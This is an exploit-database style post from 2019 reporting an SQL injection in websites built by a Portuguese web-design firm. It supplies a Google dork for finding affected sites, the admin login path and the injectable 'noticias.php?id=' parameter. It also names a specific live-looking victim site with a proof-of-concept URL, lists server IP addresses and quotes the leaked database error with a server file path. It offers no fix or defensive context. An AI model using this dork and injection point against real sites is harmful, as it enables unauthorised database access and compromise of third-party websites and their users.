#################################################################### # Exploit Title : Desenvolvido por Fidelizarte Web Design Portugal SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 15/01/2019 # Vendor Homepage : fidelizarte.pt # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Desenvolvido por Fidelizarte'' site:pt # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################### # Admin Panel Login Path : ************************* /admin/ # SQL Injection Exploit : *********************** /noticias.php?id=[SQL Injection] ################################################################### # Example Vulnerable Site : ************************* [+] jetexpress.pt/noticias.php?id=2%27 => [ Proof of Concept ] => archive.is/ysmky Note : (185.15.22.176) => There are 112 domains hosted on this server. Note : (185.15.22.148) => There are 36 domains hosted on this server. #################################################################### # SQL Database Error : ********************** Fatal error: Call to a member function fetchAll() on a non-object in /home/jetexpre/public_html/noticias.php on line 139 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################